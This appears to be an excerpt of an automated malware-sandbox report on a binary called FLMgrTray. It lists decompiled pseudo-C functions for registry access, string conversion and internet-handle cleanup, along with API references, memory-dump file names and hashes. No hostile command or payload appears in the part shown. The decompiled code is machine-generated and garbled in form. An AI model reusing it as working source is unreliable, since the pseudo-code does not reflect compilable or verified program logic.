                                                                                          • Part of subcall function 00184650: _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00184741
                                                                                          • Part of subcall function 0016C3D0: memcpy.VCRUNTIME140(00000000,001815A3,001815A3,FEAE18E9,00000005), ref: 0016C43D
                                                                                          • Part of subcall function 00184770: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,?,00000000,00000000,00000000,00000000), ref: 001847CC
                                                                                          • Part of subcall function 00184770: memset.VCRUNTIME140(00000000,00000000,00000001,00000001), ref: 001847DF
                                                                                          • Part of subcall function 00184770: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,?,00000000,00000000,00000000,00000000), ref: 00184803
                                                                                          • Part of subcall function 00184770: _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00184869
                                                                                          • Part of subcall function 00183840: fopen_s.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,wb+,?,00000000,00000000,?,00000000,00000000,Mozilla/4.0 (compatible; ),2C80D730), ref: 00183906
                                                                                          • Part of subcall function 00183840: _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,00000000,00000000,Mozilla/4.0 (compatible; ),2C80D730), ref: 00183A02
                                                                                          • Part of subcall function 00183840: _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,00000000,00000000,Mozilla/4.0 (compatible; ),2C80D730), ref: 00183A4A
                                                                                        • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00183B24
                                                                                        • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00183B74
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000017.00000002.771659906.0000000000161000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00160000, based on PE: true
                                                                                        • Associated: 00000017.00000002.771635853.0000000000160000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                        • Associated: 00000017.00000002.771755110.000000000018F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                        • Associated: 00000017.00000002.771801534.000000000019D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                        • Associated: 00000017.00000002.771814639.000000000019F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_23_2_160000_FLMgrTray.jbxd
                                                                                        Similarity
                                                                                        • API ID: _invalid_parameter_noinfo_noreturn$ByteCharMultiWide$memset$fopen_smemcpy
                                                                                        • String ID:
                                                                                        • API String ID: 1891528419-0
                                                                                        • Opcode ID: 6c8a90992f8e8e5319e5da35f041329c106c4af047bf3430b54eaf2670521b4c
                                                                                        • Instruction ID: b83b5cca40d593b6ed988d9fc5ada972952ac56caeffce4bf632b5642c4d0d20
                                                                                        • Opcode Fuzzy Hash: 6c8a90992f8e8e5319e5da35f041329c106c4af047bf3430b54eaf2670521b4c
                                                                                        • Instruction Fuzzy Hash: F9313672A00048ABCB04FF28EC46B9D7B65EB46724F54821DF81487791EB3997448FD1
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        C-Code - Quality: 33%
                                                                                        			E00183C60(void* __ebx, void* __eflags, char* _a4, char _a8, signed int _a28) {
                                                                                        				char _v8;
                                                                                        				char _v16;
                                                                                        				signed int _v20;
                                                                                        				char _v24;
                                                                                        				char* _v32;
                                                                                        				signed int _v36;
                                                                                        				char _v56;
                                                                                        				void* __edi;
                                                                                        				void* __esi;
                                                                                        				void* __ebp;
                                                                                        				signed int _t27;
                                                                                        				intOrPtr _t38;
                                                                                        				intOrPtr _t41;
                                                                                        				intOrPtr _t52;
                                                                                        				signed int _t53;
                                                                                        				signed int _t54;
                                                                                        				void* _t55;
                                                                                        				void* _t56;
                                                                                        				void* _t57;
                                                                                        				char* _t58;
                                                                                        				void* _t60;
                                                                                        				signed int _t63;
                                                                                        				void* _t64;
                                                                                        				void* _t67;
                                                                                        				void* _t69;
                                                                                        				void* _t71;
                                                                                        
                                                                                        				_t71 = __eflags;
                                                                                        				_push(0xffffffff);
                                                                                        				_t27 =  *0x19d05c; // 0x2c80d730
                                                                                        				_v20 = _t27 ^ _t63;
                                                                                        				 *[fs:0x0] =  &_v16;
                                                                                        				_t58 = _a4;
                                                                                        				_v32 = _t58;
                                                                                        				_v24 = 0;
                                                                                        				 *((intOrPtr*)(_t58 + 0x10)) = 0;
                                                                                        				 *((intOrPtr*)(_t58 + 0x14)) = 0xf;
                                                                                        				_v8 = 1;
                                                                                        				 *_t58 = 0;
                                                                                        				_v24 = 1;
                                                                                        				E0016C3D0( &_v56,  &_a8);
                                                                                        				_t66 = _t64 - 0x10;
                                                                                        				_v8 = 2;
                                                                                        				_t67 = _t64 - 0xfffffffffffffff8;
                                                                                        				E0016C3D0(_t67,  &_v56);
                                                                                        				E00184650(_t67, _t64 - 0x10, _t58, _t27 ^ _t63, _t57, _t60,  *[fs:0x0], E0018E609);
                                                                                        				E00183D80(__ebx, _t58, _t66, _t71); // executed
                                                                                        				_t53 = _v36;
                                                                                        				_t69 = _t67 + 0x38;
                                                                                        				if(_t53 < 8) {
                                                                                        					L5:
                                                                                        					_t54 = _a28;
                                                                                        					if(_t54 >= 8) {
                                                                                        						_t51 = _a8;
                                                                                        						_t55 = 2 + _t54 * 2;
                                                                                        						_t38 = _t51;
                                                                                        						if(_t55 >= 0x1000) {
                                                                                        							_t23 = _t51 - 4; // 0x1065e
                                                                                        							_t51 =  *_t23;
                                                                                        							_t55 = _t55 + 0x23;
                                                                                        							if(_t38 > 0x1f) {
                                                                                        								__imp___invalid_parameter_noinfo_noreturn();
                                                                                        							}
                                                                                        						}
                                                                                        						_push(_t55);
                                                                                        						E00175733(_t38, _t51);
                                                                                        					}
                                                                                        					 *[fs:0x0] = _v16;
                                                                                        					return E001755F4(_v20 ^ _t63);
                                                                                        				}
                                                                                        				_t52 = _v56;
                                                                                        				_t56 = 2 + _t53 * 2;
                                                                                        				_t41 = _t52;
                                                                                        				if(_t56 >= 0x1000) {
                                                                                        					_t52 =  *((intOrPtr*)(_t52 - 4));
                                                                                        					_t56 = _t56 + 0x23;
                                                                                        					if(_t41 > 0x1f) {
                                                                                        						__imp___invalid_parameter_noinfo_noreturn();
                                                                                        					}
                                                                                        				}
                                                                                        				_push(_t56);
                                                                                        				E00175733(_t41, _t52);
                                                                                        				_t69 = _t69 + 8;
                                                                                        				goto L5;
                                                                                        			}





























                                                                                        0x00183c60
                                                                                        0x00183c63
                                                                                        0x00183c74
                                                                                        0x00183c7b
                                                                                        0x00183c84
                                                                                        0x00183c8a
                                                                                        0x00183c8d
                                                                                        0x00183c90
                                                                                        0x00183c97
                                                                                        0x00183c9e
                                                                                        0x00183ca5
                                                                                        0x00183cac
                                                                                        0x00183cb2
                                                                                        0x00183cbd
                                                                                        0x00183cc3
                                                                                        0x00183cc6
                                                                                        0x00183ccf
                                                                                        0x00183cd5
                                                                                        0x00183cdb
                                                                                        0x00183ce3
                                                                                        0x00183ce8
                                                                                        0x00183ceb
                                                                                        0x00183cf1
                                                                                        0x00183d27
                                                                                        0x00183d27
                                                                                        0x00183d2d
                                                                                        0x00183d2f
                                                                                        0x00183d32
                                                                                        0x00183d39
                                                                                        0x00183d41
                                                                                        0x00183d43
                                                                                        0x00183d43
                                                                                        0x00183d46
                                                                                        0x00183d51
                                                                                        0x00183d53
                                                                                        0x00183d53
                                                                                        0x00183d51
                                                                                        0x00183d59
                                                                                        0x00183d5b
                                                                                        0x00183d60
                                                                                        0x00183d68
                                                                                        0x00183d7f
                                                                                        0x00183d7f
                                                                                        0x00183cf3
                                                                                        0x00183cf6
                                                                                        0x00183cfd
                                                                                        0x00183d05
                                                                                        0x00183d07
                                                                                        0x00183d0a
                                                                                        0x00183d15
                                                                                        0x00183d17
                                                                                        0x00183d17
                                                                                        0x00183d15
                                                                                        0x00183d1d
                                                                                        0x00183d1f
                                                                                        0x00183d24
                                                                                        0x00000000

                                                                                        APIs
                                                                                          • Part of subcall function 0016C3D0: memcpy.VCRUNTIME140(00000000,001815A3,001815A3,FEAE18E9,00000005), ref: 0016C43D
                                                                                          • Part of subcall function 00184650: WideCharToMultiByte.KERNEL32(00000000,00000000,013C1C88,?,00000000,00000000,00000000,00000000), ref: 001846A9
                                                                                          • Part of subcall function 00184650: memset.VCRUNTIME140(00000000,00000000,00000001,00000001), ref: 001846BC
                                                                                          • Part of subcall function 00184650: WideCharToMultiByte.KERNEL32(00000000,00000000,013C1C88,?,00000000,00000000,00000000,00000000), ref: 001846DD
                                                                                          • Part of subcall function 00184650: _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00184741
                                                                                          • Part of subcall function 00183D80: memset.VCRUNTIME140(?,00000000,00000400,?,00000000,00000000,?,00000000,00000000,Mozilla/4.0 (compatible; ),2C80D730,?,?,013C1C88), ref: 00183E3B
                                                                                          • Part of subcall function 00183D80: memmove.VCRUNTIME140(00000000,?,00000000,?,00000400,00000000,?), ref: 00183EBC
                                                                                        • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00183D17
                                                                                        • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00183D53
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000017.00000002.771659906.0000000000161000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00160000, based on PE: true
                                                                                        • Associated: 00000017.00000002.771635853.0000000000160000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                        • Associated: 00000017.00000002.771755110.000000000018F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                        • Associated: 00000017.00000002.771801534.000000000019D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                        • Associated: 00000017.00000002.771814639.000000000019F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_23_2_160000_FLMgrTray.jbxd
                                                                                        Similarity
                                                                                        • API ID: _invalid_parameter_noinfo_noreturn$ByteCharMultiWidememset$memcpymemmove
                                                                                        • String ID:
                                                                                        • API String ID: 241436044-0
                                                                                        • Opcode ID: a94b92e73591abff15ae7facad920db5491001ca3c2be3bb8e862331c5aa15a2
                                                                                        • Instruction ID: 12e5847709cb35b197bfe13364e30fb215a843245ef7a85bc7831429b26b3fd9
                                                                                        • Opcode Fuzzy Hash: a94b92e73591abff15ae7facad920db5491001ca3c2be3bb8e862331c5aa15a2
                                                                                        • Instruction Fuzzy Hash: 82313731A001489BCB04EF68DC49BADBB76EB85710F54821AF41097781DB74AB40CFA1
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        C-Code - Quality: 77%
                                                                                        			E00182670(void* __ebx, void** __ecx, void* __edi) {
                                                                                        				char _v16;
                                                                                        				void* __esi;
                                                                                        				signed int _t5;
                                                                                        				void* _t8;
                                                                                        				void* _t9;
                                                                                        				void* _t13;
                                                                                        				void* _t19;
                                                                                        				void* _t20;
                                                                                        				void** _t23;
                                                                                        				signed int _t25;
                                                                                        
                                                                                        				_t20 = __edi;
                                                                                        				_t13 = __ebx;
                                                                                        				_push(0xffffffff);
                                                                                        				_push(E0018E370);
                                                                                        				_push( *[fs:0x0]);
                                                                                        				_t5 =  *0x19d05c; // 0x2c80d730
                                                                                        				_push(_t5 ^ _t25);
                                                                                        				 *[fs:0x0] =  &_v16;
                                                                                        				_t22 = __ecx;
                                                                                        				_t8 =  *__ecx;
                                                                                        				if(_t8 == 0) {
                                                                                        					_t23 =  &(__ecx[3]);
                                                                                        				} else {
                                                                                        					if(__ecx[2] == 0) {
                                                                                        						RegFlushKey(_t8);
                                                                                        						_t8 =  *_t22;
                                                                                        					}
                                                                                        					RegCloseKey(_t8); // executed
                                                                                        					 *_t22 = 0;
                                                                                        					_t23 =  &(_t22[3]);
                                                                                        					E00163540(_t13, _t19, _t20, 0x18fe18, 0);
                                                                                        				}
                                                                                        				_t9 = E00163190(_t23, _t23);
                                                                                        				 *[fs:0x0] = _v16;
                                                                                        				return _t9;
                                                                                        			}













                                                                                        0x00182670
                                                                                        0x00182670
                                                                                        0x00182673
                                                                                        0x00182675
                                                                                        0x00182680
                                                                                        0x00182682
                                                                                        0x00182689
                                                                                        0x0018268d
                                                                                        0x00182693
                                                                                        0x00182695
                                                                                        0x00182699
                                                                                        0x001826ca
                                                                                        0x0018269b
                                                                                        0x0018269f
                                                                                        0x001826a2
                                                                                        0x001826a8
                                                                                        0x001826a8
                                                                                        0x001826ab
                                                                                        0x001826b1
                                                                                        0x001826b7
                                                                                        0x001826c3
                                                                                        0x001826c3
                                                                                        0x001826cf
                                                                                        0x001826d7
                                                                                        0x001826e3

                                                                                        APIs
                                                                                        • RegFlushKey.ADVAPI32(000000FF,2C80D730,00000000,00000000,0018E370,000000FF,?,0017F653), ref: 001826A2
                                                                                        • RegCloseKey.KERNEL32(000000FF,2C80D730,00000000,00000000,0018E370,000000FF,?,0017F653), ref: 001826AB
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000017.00000002.771659906.0000000000161000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00160000, based on PE: true
                                                                                        • Associated: 00000017.00000002.771635853.0000000000160000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                        • Associated: 00000017.00000002.771755110.000000000018F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                        • Associated: 00000017.00000002.771801534.000000000019D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                        • Associated: 00000017.00000002.771814639.000000000019F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_23_2_160000_FLMgrTray.jbxd
                                                                                        Similarity
                                                                                        • API ID: CloseFlush
                                                                                        • String ID:
                                                                                        • API String ID: 320916635-0
                                                                                        • Opcode ID: f9007cdc01aff52804d1b2a1a9016c30f9c05f3f3bd9c6201e7e6504961039ed
                                                                                        • Instruction ID: 91584fa59094f15b4d703df3994b38ac8848ef14551e7e87ef0df8188613194a
                                                                                        • Opcode Fuzzy Hash: f9007cdc01aff52804d1b2a1a9016c30f9c05f3f3bd9c6201e7e6504961039ed
                                                                                        • Instruction Fuzzy Hash: 1FF0A472E04A049FC721AF14DC05B59B7E8EB05B10F21492FFC16D3791EB749E408BA4
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        C-Code - Quality: 71%
                                                                                        			E001759BE(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                                                                                        				signed int _v0;
                                                                                        				void* _t3;
                                                                                        				signed int _t8;
                                                                                        
                                                                                        				E00175A02(__ebx, __edx, __edi, __esi); // executed
                                                                                        				_t3 = E001757F0(__edx, 0);
                                                                                        				_t24 = _t3;
                                                                                        				if(_t3 == 0) {
                                                                                        					E001763DC(__edx, __edi, __esi, 7);
                                                                                        					asm("int3");
                                                                                        					_push(0x20);
                                                                                        					asm("ror eax, cl");
                                                                                        					_t8 = _v0 ^  *0x19d05c;
                                                                                        					__eflags = _t8;
                                                                                        					return _t8;
                                                                                        				} else {
                                                                                        					E001759A9(_t24, 0x175af1);
                                                                                        					return 0;
                                                                                        				}
                                                                                        			}






                                                                                        0x001759be
                                                                                        0x001759c5
                                                                                        0x001759cb
                                                                                        0x001759cd
                                                                                        0x001759df
                                                                                        0x001759e4
                                                                                        0x001759f0
                                                                                        0x001759f8
                                                                                        0x001759fa
                                                                                        0x001759fa
                                                                                        0x00175a01
                                                                                        0x001759cf
                                                                                        0x001759d4
                                                                                        0x001759dc
                                                                                        0x001759dc

                                                                                        APIs
                                                                                        • __scrt_initialize_thread_safe_statics_platform_specific.LIBCMT ref: 001759BE
                                                                                          • Part of subcall function 00175A02: InitializeCriticalSectionAndSpinCount.KERNEL32(0019DC18,00000FA0,2C80D730,?,?,?,?,0018DAEC,000000FF), ref: 00175A31
                                                                                          • Part of subcall function 00175A02: GetModuleHandleW.KERNEL32(api-ms-win-core-synch-l1-2-0.dll,?,?,?,?,0018DAEC,000000FF), ref: 00175A3C
                                                                                          • Part of subcall function 00175A02: GetModuleHandleW.KERNEL32(kernel32.dll,?,?,?,?,0018DAEC,000000FF), ref: 00175A4D
                                                                                          • Part of subcall function 00175A02: GetProcAddress.KERNEL32(00000000,InitializeConditionVariable), ref: 00175A63
                                                                                          • Part of subcall function 00175A02: GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 00175A71
                                                                                          • Part of subcall function 00175A02: GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 00175A7F
                                                                                          • Part of subcall function 00175A02: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 00175AAA
                                                                                          • Part of subcall function 00175A02: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 00175AB5
                                                                                        • ___scrt_fastfail.LIBCMT ref: 001759DF
                                                                                          • Part of subcall function 001759A9: __onexit.LIBCMT ref: 001759AF
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000017.00000002.771659906.0000000000161000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00160000, based on PE: true
                                                                                        • Associated: 00000017.00000002.771635853.0000000000160000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                        • Associated: 00000017.00000002.771755110.000000000018F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                        • Associated: 00000017.00000002.771801534.000000000019D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                        • Associated: 00000017.00000002.771814639.000000000019F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_23_2_160000_FLMgrTray.jbxd
                                                                                        Similarity
                                                                                        • API ID: AddressProc$HandleModule__crt_fast_encode_pointer$CountCriticalInitializeSectionSpin___scrt_fastfail__onexit__scrt_initialize_thread_safe_statics_platform_specific
                                                                                        • String ID:
                                                                                        • API String ID: 66158676-0
                                                                                        • Opcode ID: 6fbacb709aa7a0a49ae6ab18ed824d3d94c7b772a89b75b25a1043dc4b52c21d
                                                                                        • Instruction ID: 144ed549a1742f7134d9e0c9c61a9a664a74e195a8b1749531a44357474f2e8b
                                                                                        • Opcode Fuzzy Hash: 6fbacb709aa7a0a49ae6ab18ed824d3d94c7b772a89b75b25a1043dc4b52c21d
                                                                                        • Instruction Fuzzy Hash: D3E0E611264B0497DB48EA6CF847B4433A65714725F54C416B60CDF9C3DFE194818599
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        C-Code - Quality: 100%
                                                                                        			E001827B0(void** __ecx) {
                                                                                        				void* _t3;
                                                                                        				void* _t7;
                                                                                        				void* _t10;
                                                                                        				void* _t11;
                                                                                        				void** _t12;
                                                                                        
                                                                                        				_t12 = __ecx;
                                                                                        				_t3 =  *__ecx;
                                                                                        				if(_t3 != 0) {
                                                                                        					if(__ecx[2] == 0) {
                                                                                        						RegFlushKey(_t3);
                                                                                        						_t3 =  *_t12;
                                                                                        					}
                                                                                        					RegCloseKey(_t3); // executed
                                                                                        					 *_t12 = 0;
                                                                                        					return E00163540(_t7, _t10, _t11, 0x18fe18, 0);
                                                                                        				}
                                                                                        				return _t3;
                                                                                        			}








                                                                                        0x001827b1
                                                                                        0x001827b3
                                                                                        0x001827b7
                                                                                        0x001827bd
                                                                                        0x001827c0
                                                                                        0x001827c6
                                                                                        0x001827c6
                                                                                        0x001827c9
                                                                                        0x001827d9
                                                                                        0x00000000
                                                                                        0x001827df
                                                                                        0x001827e5

                                                                                        APIs
                                                                                        • RegFlushKey.ADVAPI32(00000000,00000000,0017F45D,?,?,?,80000001,80000001,80000001,?,?), ref: 001827C0
                                                                                        • RegCloseKey.KERNEL32(00000000,00000000,0017F45D,?,?,?,80000001,80000001,80000001,?,?), ref: 001827C9
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000017.00000002.771659906.0000000000161000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00160000, based on PE: true
                                                                                        • Associated: 00000017.00000002.771635853.0000000000160000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                        • Associated: 00000017.00000002.771755110.000000000018F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                        • Associated: 00000017.00000002.771801534.000000000019D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                        • Associated: 00000017.00000002.771814639.000000000019F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_23_2_160000_FLMgrTray.jbxd
                                                                                        Similarity
                                                                                        • API ID: CloseFlush
                                                                                        • String ID:
                                                                                        • API String ID: 320916635-0
                                                                                        • Opcode ID: 5c186645e0122e8781a283f2d36d0e07b4082ac98bdc7cea2918ff8e90ac0803
                                                                                        • Instruction ID: 480c459055ee59b26dfef9c8a008a13c09a26093df6b7d0e653937526acd04a8
                                                                                        • Opcode Fuzzy Hash: 5c186645e0122e8781a283f2d36d0e07b4082ac98bdc7cea2918ff8e90ac0803
                                                                                        • Instruction Fuzzy Hash: AEE012715046009FE735AF69EC48B91B7D89F24711F20881FF895C3591D774DAC18F65
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        C-Code - Quality: 43%
                                                                                        			E00186500(intOrPtr __ecx, intOrPtr* _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                                        				void* _v8;
                                                                                        				char _v16;
                                                                                        				intOrPtr _v20;
                                                                                        				char _v21;
                                                                                        				intOrPtr _v28;
                                                                                        				void* __ebx;
                                                                                        				void* __edi;
                                                                                        				signed int _t19;
                                                                                        				intOrPtr _t23;
                                                                                        				intOrPtr* _t25;
                                                                                        				void* _t26;
                                                                                        				intOrPtr _t29;
                                                                                        				void* _t31;
                                                                                        				void* _t36;
                                                                                        				intOrPtr* _t42;
                                                                                        				unsigned int _t45;
                                                                                        				intOrPtr* _t47;
                                                                                        				intOrPtr _t50;
                                                                                        				signed int _t52;
                                                                                        				void* _t53;
                                                                                        
                                                                                        				_push(0xffffffff);
                                                                                        				_push(E0018E880);
                                                                                        				_push( *[fs:0x0]);
                                                                                        				_t19 =  *0x19d05c; // 0x2c80d730
                                                                                        				_push(_t19 ^ _t52);
                                                                                        				 *[fs:0x0] =  &_v16;
                                                                                        				_v20 = _t53 - 0x10;
                                                                                        				_t50 = __ecx;
                                                                                        				_v28 = __ecx;
                                                                                        				_t36 = 0;
                                                                                        				_v21 = 0;
                                                                                        				_v8 = 0;
                                                                                        				_t23 = _a8;
                                                                                        				if(_t23 == 0) {
                                                                                        					_t25 =  *((intOrPtr*)( *((intOrPtr*)(__ecx)) + 0x10));
                                                                                        					goto L6;
                                                                                        				} else {
                                                                                        					_t31 = _t23 - 1;
                                                                                        					if(_t31 == 0) {
                                                                                        						_t25 =  *((intOrPtr*)( *((intOrPtr*)(__ecx)) + 0xc));
                                                                                        						goto L6;
                                                                                        					} else {
                                                                                        						if(_t31 != 1) {
                                                                                        							L10:
                                                                                        							InternetCloseHandle( *(_t50 + 0xc));
                                                                                        							 *(_t50 + 0xc) = 0;
                                                                                        						} else {
                                                                                        							_t25 =  *((intOrPtr*)( *((intOrPtr*)(__ecx)) + 8));
                                                                                        							L6:
                                                                                        							_t47 = _a4;
                                                                                        							_t26 =  *_t25(_t47, _a12); // executed
                                                                                        							_t36 = _t26;
                                                                                        							_v21 = _t36;
                                                                                        							if(_t36 == 0) {
                                                                                        								goto L10;
                                                                                        							} else {
                                                                                        								_t42 = _t47;
                                                                                        								_t45 = _t42 + 1;
                                                                                        								asm("o16 nop [eax+eax]");
                                                                                        								do {
                                                                                        									_t29 =  *_t42;
                                                                                        									_t42 = _t42 + 1;
                                                                                        								} while (_t29 != 0);
                                                                                        								E00163450(_t36, _t45, _t47, _t47, _t42 - _t45);
                                                                                        							}
                                                                                        						}
                                                                                        					}
                                                                                        				}
                                                                                        				 *[fs:0x0] = _v16;
                                                                                        				return _t36;
                                                                                        			}























                                                                                        0x00186503
                                                                                        0x00186505
                                                                                        0x00186510
                                                                                        0x00186517
                                                                                        0x0018651e
                                                                                        0x00186522
                                                                                        0x00186528
                                                                                        0x0018652b
                                                                                        0x0018652d
                                                                                        0x00186533
                                                                                        0x00186535
                                                                                        0x00186538
                                                                                        0x0018653f
                                                                                        0x00186542
                                                                                        0x0018655e
                                                                                        0x00000000
                                                                                        0x00186544
                                                                                        0x00186544
                                                                                        0x00186547
                                                                                        0x00186557
                                                                                        0x00000000
                                                                                        0x00186549
                                                                                        0x0018654c
                                                                                        0x00186595
                                                                                        0x00186598
                                                                                        0x0018659e
                                                                                        0x0018654e
                                                                                        0x00186550
                                                                                        0x00186561
                                                                                        0x00186564
                                                                                        0x0018656a
                                                                                        0x0018656c
                                                                                        0x0018656e
                                                                                        0x00186573
                                                                                        0x00000000
                                                                                        0x00186575
                                                                                        0x00186575
                                                                                        0x00186577
                                                                                        0x0018657a
                                                                                        0x00186580
                                                                                        0x00186580
                                                                                        0x00186582
                                                                                        0x00186583
                                                                                        0x0018658e
                                                                                        0x0018658e
                                                                                        0x00186573
                                                                                        0x0018654c
                                                                                        0x00186547
                                                                                        0x001865e1
                                                                                        0x001865ef

                                                                                        APIs
                                                                                        • InternetCloseHandle.WININET(?), ref: 00186598
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000017.00000002.771659906.0000000000161000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00160000, based on PE: true
                                                                                        • Associated: 00000017.00000002.771635853.0000000000160000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                        • Associated: 00000017.00000002.771755110.000000000018F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                        • Associated: 00000017.00000002.771801534.000000000019D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                        • Associated: 00000017.00000002.771814639.000000000019F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_23_2_160000_FLMgrTray.jbxd
                                                                                        Similarity
                                                                                        • API ID: CloseHandleInternet
                                                                                        • String ID:
                                                                                        • API String ID: 1081599783-0
                                                                                        • Opcode ID: abbaf007a4948f4fc82b527e18fc7c1ecc58aa0590007325d9d991d332509178
                                                                                        • Instruction ID: 183603fa6212613d5f63c87cf5cf7c9cd54b29ff4385a0f0a0b0afe58a616af5
                                                                                        • Opcode Fuzzy Hash: abbaf007a4948f4fc82b527e18fc7c1ecc58aa0590007325d9d991d332509178
                                                                                        • Instruction Fuzzy Hash: 0621CF36604204DFC725DF2CD854BAABBF8FB1A360F14865DE85587755CB32AA05CF90
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        C-Code - Quality: 94%
                                                                                        			E001827F0(void** __ecx, short* _a4, char* _a8, int _a12, intOrPtr* _a16) {
                                                                                        				int _v8;
                                                                                        				long _t20;
                                                                                        				int _t21;
                                                                                        				void** _t42;
                                                                                        
                                                                                        				_push(__ecx);
                                                                                        				_v8 = 0;
                                                                                        				_t42 = __ecx;
                                                                                        				_t20 = RegQueryValueExW( *__ecx, _a4, 0,  &_v8, _a8,  &_a12); // executed
                                                                                        				 *(_t42 + 0x2c) = _t20;
                                                                                        				if(_t20 == 0) {
                                                                                        					_t21 = _v8;
                                                                                        					if(_t21 != 1) {
                                                                                        						if(_t21 != 2) {
                                                                                        							if(_t21 != 7) {
                                                                                        								if(_t21 != 4) {
                                                                                        									_t35 =  ==  ? 5 : 0;
                                                                                        									 *_a16 =  ==  ? 5 : 0;
                                                                                        									return _a12;
                                                                                        								} else {
                                                                                        									 *_a16 = _t21;
                                                                                        									return _a12;
                                                                                        								}
                                                                                        							} else {
                                                                                        								 *_a16 = 3;
                                                                                        								return _a12;
                                                                                        							}
                                                                                        						} else {
                                                                                        							 *_a16 = _t21;
                                                                                        							return _a12;
                                                                                        						}
                                                                                        					} else {
                                                                                        						 *_a16 = _t21;
                                                                                        						return _a12;
                                                                                        					}
                                                                                        				} else {
                                                                                        					return 0;
                                                                                        				}
                                                                                        			}







                                                                                        0x001827f3
                                                                                        0x001827f8
                                                                                        0x00182806
                                                                                        0x00182810
                                                                                        0x00182816
                                                                                        0x0018281c
                                                                                        0x00182826
                                                                                        0x0018282c
                                                                                        0x00182841
                                                                                        0x00182856
                                                                                        0x0018286e
                                                                                        0x0018288d
                                                                                        0x00182890
                                                                                        0x00182898
                                                                                        0x00182870
                                                                                        0x00182875
                                                                                        0x0018287d
                                                                                        0x0018287d
                                                                                        0x00182858
                                                                                        0x00182860
                                                                                        0x00182868
                                                                                        0x00182868
                                                                                        0x00182843
                                                                                        0x00182848
                                                                                        0x00182850
                                                                                        0x00182850
                                                                                        0x0018282e
                                                                                        0x00182833
                                                                                        0x0018283b
                                                                                        0x0018283b
                                                                                        0x0018281e
                                                                                        0x00182823
                                                                                        0x00182823

                                                                                        APIs
                                                                                        • RegQueryValueExW.KERNEL32(00000000,?,00000000,00000000,00000000,?,80000001,00000000,?,0018332D,?,00000000,?), ref: 00182810
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000017.00000002.771659906.0000000000161000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00160000, based on PE: true
                                                                                        • Associated: 00000017.00000002.771635853.0000000000160000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                        • Associated: 00000017.00000002.771755110.000000000018F000.00000002.00000001.01000000.0000000C.sdmpDownload File
